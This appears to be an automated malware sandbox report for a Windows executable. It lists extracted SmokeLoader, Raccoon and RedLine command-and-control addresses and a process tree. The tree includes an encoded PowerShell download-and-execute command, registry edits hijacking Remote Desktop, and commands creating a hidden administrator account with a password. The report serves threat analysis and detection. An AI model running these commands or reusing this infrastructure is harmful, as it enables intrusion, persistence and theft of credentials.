Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    12-10-2021 12:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe

  • Size

    175KB

  • MD5

    b6ccbe38498d3243118d076fe793989e

  • SHA1

    d52cccb6054172e93c752de847eb15ca30545068

  • SHA256

    66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17

  • SHA512

    6b6f89a2245e64385ca5612f592460c1e66b03a708d98f8dc08f7034167e1141c29d4b843e5fbfbc5e437b112d1e30797dfe8c504fc5ef8fafe71cb6f5a01139

Score
10/10
raccoonredlineservhelpersmokeloaderxmrig15927d80aa27e80cd2ef63c638e2752e24242d1b37c8d179b9e611eee525425544ee8c6d77360ab7cd9w1backdoordiscoveryinfostealerminerpersistencespywarestealersuricatatrojanupxvmprotect

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

C2

http://linavanandr11.club/

http://iselaharty12.club/

http://giovaninardo13.club/

http://zayneliann14.club/

http://zorinosali15.club/
rc4.i32
rc4.i32

Extracted

Family

raccoon

Version

1.8.2

Botnet

8d179b9e611eee525425544ee8c6d77360ab7cd9

Attributes
  • url4cnc

    http://teletop.top/agrybirdsgamerept

    http://teleta.top/agrybirdsgamerept

    https://t.me/agrybirdsgamerept

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

159

C2

190.2.136.29:3279

Extracted

Family

raccoon

Version

1.8.2

Botnet

27d80aa27e80cd2ef63c638e2752e24242d1b37c

Attributes
  • url4cnc

    http://telemirror.top/ararius809b

    http://tgmirror.top/ararius809b

    http://telegatt.top/ararius809b

    http://telegka.top/ararius809b

    http://telegin.top/ararius809b

    https://t.me/ararius809b

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

w1

C2

109.234.34.165:12323

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 5 IoCs
  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

    trojanbackdoorservhelper
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • suricata: ET MALWARE ServHelper CnC Inital Checkin

    suricata: ET MALWARE ServHelper CnC Inital Checkin

    suricata
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 8 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 24 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe
    "C:\Users\Admin\AppData\Local\Temp\66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3704
    • C:\Users\Admin\AppData\Local\Temp\66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe
      "C:\Users\Admin\AppData\Local\Temp\66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:4364
  • C:\Users\Admin\AppData\Local\Temp\F34A.exe
    C:\Users\Admin\AppData\Local\Temp\F34A.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:772
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1008
  • C:\Users\Admin\AppData\Local\Temp\FDCA.exe
    C:\Users\Admin\AppData\Local\Temp\FDCA.exe
    1⤵
    • Executes dropped EXE
    PID:4292
  • C:\Users\Admin\AppData\Local\Temp\D3D.exe
    C:\Users\Admin\AppData\Local\Temp\D3D.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3156
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4972
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mvqhkszm\mvqhkszm.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2820
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES391D.tmp" "c:\Users\Admin\AppData\Local\Temp\mvqhkszm\CSCD76DBC5193664ECEA183C9CC9464DAA6.TMP"
          4⤵
            PID:3412
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:952
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2508
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
            PID:1048
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
            3⤵
              PID:2072
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
              3⤵
              • Modifies registry key
              PID:2136
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
              3⤵
                PID:4584
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                3⤵
                  PID:3964
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                    4⤵
                      PID:3480
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                    3⤵
                      PID:1236
                      • C:\Windows\system32\cmd.exe
                        cmd /c net start rdpdr
                        4⤵
                          PID:1592
                          • C:\Windows\system32\net.exe
                            net start rdpdr
                            5⤵
                              PID:1264
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 start rdpdr
                                6⤵
                                  PID:2360
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                            3⤵
                              PID:2700
                              • C:\Windows\system32\cmd.exe
                                cmd /c net start TermService
                                4⤵
                                  PID:2724
                                  • C:\Windows\system32\net.exe
                                    net start TermService
                                    5⤵
                                      PID:4440
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 start TermService
                                        6⤵
                                          PID:4436
                                  • C:\Windows\system32\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                    3⤵
                                      PID:4788
                                    • C:\Windows\system32\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                      3⤵
                                        PID:4944
                                  • C:\Users\Admin\AppData\Local\Temp\1358.exe
                                    C:\Users\Admin\AppData\Local\Temp\1358.exe
                                    1⤵
                                    • Executes dropped EXE
                                    PID:376
                                  • C:\Users\Admin\AppData\Local\Temp\19B2.exe
                                    C:\Users\Admin\AppData\Local\Temp\19B2.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1852
                                  • C:\Users\Admin\AppData\Local\Temp\29E0.exe
                                    C:\Users\Admin\AppData\Local\Temp\29E0.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:4276
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                      2⤵
                                      • Drops file in System32 directory
                                      • Drops file in Windows directory
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of WriteProcessMemory
                                      PID:2504
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2rpuo5xa\2rpuo5xa.cmdline"
                                        3⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2728
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6108.tmp" "c:\Users\Admin\AppData\Local\Temp\2rpuo5xa\CSCCADD0BA021BA460E81240DED36F57D6.TMP"
                                          4⤵
                                            PID:520
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                          3⤵
                                            PID:3200
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                            3⤵
                                              PID:5028
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                              3⤵
                                                PID:4776
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                                3⤵
                                                  PID:4960
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                                  3⤵
                                                  • Modifies registry key
                                                  PID:376
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                                  3⤵
                                                    PID:1640
                                                  • C:\Windows\SysWOW64\net.exe
                                                    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                    3⤵
                                                      PID:4352
                                                      • C:\Windows\SysWOW64\net1.exe
                                                        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                        4⤵
                                                          PID:4480
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                                        3⤵
                                                          PID:4348
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /c net start rdpdr
                                                            4⤵
                                                              PID:3644
                                                              • C:\Windows\SysWOW64\net.exe
                                                                net start rdpdr
                                                                5⤵
                                                                  PID:4628
                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                    C:\Windows\system32\net1 start rdpdr
                                                                    6⤵
                                                                      PID:4784
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                                3⤵
                                                                  PID:2748
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c net start TermService
                                                                    4⤵
                                                                      PID:2184
                                                                      • C:\Windows\SysWOW64\net.exe
                                                                        net start TermService
                                                                        5⤵
                                                                          PID:372
                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                            C:\Windows\system32\net1 start TermService
                                                                            6⤵
                                                                              PID:2096
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                                                        3⤵
                                                                          PID:4592
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                                                          3⤵
                                                                            PID:1760
                                                                      • C:\Users\Admin\AppData\Local\Temp\2FFB.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\2FFB.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4444
                                                                        • C:\Users\Admin\AppData\Local\Temp\2FFB.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\2FFB.exe
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5068
                                                                      • C:\Windows\System32\cmd.exe
                                                                        cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del
                                                                        1⤵
                                                                          PID:4788
                                                                          • C:\Windows\system32\net.exe
                                                                            net.exe user WgaUtilAcc Ghasar4f5 /del
                                                                            2⤵
                                                                              PID:2008
                                                                              • C:\Windows\system32\net1.exe
                                                                                C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del
                                                                                3⤵
                                                                                  PID:376
                                                                            • C:\Windows\System32\cmd.exe
                                                                              cmd /C net.exe user WgaUtilAcc HyHMEASe /add
                                                                              1⤵
                                                                                PID:3772
                                                                                • C:\Windows\system32\net.exe
                                                                                  net.exe user WgaUtilAcc HyHMEASe /add
                                                                                  2⤵
                                                                                    PID:368
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 user WgaUtilAcc HyHMEASe /add
                                                                                      3⤵
                                                                                        PID:1268
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                    1⤵
                                                                                      PID:2176
                                                                                      • C:\Windows\system32\net.exe
                                                                                        net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                        2⤵
                                                                                          PID:964
                                                                                          • C:\Windows\system32\net1.exe
                                                                                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                            3⤵
                                                                                              PID:4656
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                          1⤵
                                                                                            PID:4140
                                                                                            • C:\Windows\system32\net.exe
                                                                                              net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                              2⤵
                                                                                                PID:1484
                                                                                                • C:\Windows\system32\net1.exe
                                                                                                  C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                                  3⤵
                                                                                                    PID:1704
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                1⤵
                                                                                                  PID:1176
                                                                                                  • C:\Windows\system32\net.exe
                                                                                                    net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                    2⤵
                                                                                                      PID:1900
                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                        C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                        3⤵
                                                                                                          PID:4348
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      cmd /C net.exe user WgaUtilAcc HyHMEASe
                                                                                                      1⤵
                                                                                                        PID:4532
                                                                                                        • C:\Windows\system32\net.exe
                                                                                                          net.exe user WgaUtilAcc HyHMEASe
                                                                                                          2⤵
                                                                                                            PID:820
                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                              C:\Windows\system32\net1 user WgaUtilAcc HyHMEASe
                                                                                                              3⤵
                                                                                                                PID:2096
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            cmd.exe /C wmic path win32_VideoController get name
                                                                                                            1⤵
                                                                                                              PID:1208
                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                wmic path win32_VideoController get name
                                                                                                                2⤵
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:1264
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              cmd.exe /C wmic CPU get NAME
                                                                                                              1⤵
                                                                                                                PID:3812
                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                  wmic CPU get NAME
                                                                                                                  2⤵
                                                                                                                    PID:672
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                  1⤵
                                                                                                                    PID:2008
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                      2⤵
                                                                                                                        PID:376
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                          3⤵
                                                                                                                          • Blocklisted process makes network request
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          • Drops file in Windows directory
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          PID:2816

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • memory/376-155-0x00000000024C0000-0x0000000002551000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      580KB

                                                                                                                      Download

                                                                                                                    • memory/952-280-0x000001A955EB0000-0x000001A955EB2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/952-281-0x000001A955EB3000-0x000001A955EB5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/952-300-0x000001A955EB6000-0x000001A955EB8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/1008-149-0x0000000005260000-0x0000000005261000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1008-148-0x0000000005870000-0x0000000005871000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1008-154-0x00000000052C0000-0x00000000052C1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1008-151-0x0000000005390000-0x0000000005391000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1008-146-0x0000000000400000-0x0000000000401000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1008-162-0x0000000005300000-0x0000000005301000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1008-136-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                      Download

                                                                                                                    • memory/1008-178-0x0000000005260000-0x0000000005866000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.0MB

                                                                                                                      Download

                                                                                                                    • memory/1048-383-0x0000019A998F0000-0x0000019A998F2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/1048-384-0x0000019A998F3000-0x0000019A998F5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/1048-453-0x0000019A998F6000-0x0000019A998F8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/1852-179-0x0000000002880000-0x0000000002881000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1852-224-0x0000000007930000-0x0000000007931000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1852-214-0x0000000006950000-0x0000000006951000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1852-182-0x0000000002884000-0x0000000002885000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1852-181-0x0000000002883000-0x0000000002884000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1852-180-0x0000000002882000-0x0000000002883000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1852-218-0x0000000007260000-0x0000000007261000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1852-215-0x0000000006B20000-0x0000000006B21000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1852-168-0x0000000002860000-0x000000000287C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      112KB

                                                                                                                      Download

                                                                                                                    • memory/1852-163-0x0000000002430000-0x0000000002461000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      196KB

                                                                                                                      Download

                                                                                                                    • memory/2504-404-0x0000000006FE3000-0x0000000006FE4000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2504-324-0x0000000006FE0000-0x0000000006FE1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2504-325-0x0000000006FE2000-0x0000000006FE3000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2508-381-0x0000023A9EA38000-0x0000023A9EA3A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2508-344-0x0000023A9EA30000-0x0000023A9EA32000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2508-345-0x0000023A9EA33000-0x0000023A9EA35000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2508-347-0x0000023A9EA36000-0x0000023A9EA38000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2816-817-0x000001B56B130000-0x000001B56B132000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2816-853-0x000001B56B136000-0x000001B56B138000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2816-958-0x000001B56B138000-0x000001B56B139000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2816-820-0x000001B56B133000-0x000001B56B135000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/3048-119-0x0000000000450000-0x0000000000466000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      88KB

                                                                                                                      Download

                                                                                                                    • memory/3156-175-0x000001FDE8D25000-0x000001FDE8D26000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3156-150-0x000001FDE9140000-0x000001FDE953F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.0MB

                                                                                                                      Download

                                                                                                                    • memory/3156-132-0x00000000001E0000-0x0000000001026000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      14.3MB

                                                                                                                      Download

                                                                                                                    • memory/3156-152-0x000001FDE8D20000-0x000001FDE8D22000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/3156-174-0x000001FDE8D23000-0x000001FDE8D25000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/3156-176-0x000001FDE8D26000-0x000001FDE8D27000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3200-541-0x000000007E660000-0x000000007E661000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3200-468-0x0000000004822000-0x0000000004823000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3200-466-0x0000000004820000-0x0000000004821000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3704-118-0x0000000000030000-0x0000000000039000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      36KB

                                                                                                                      Download

                                                                                                                    • memory/3704-115-0x00000000007A1000-0x00000000007AB000-memory.dmp

                                                                                                                      Filesize

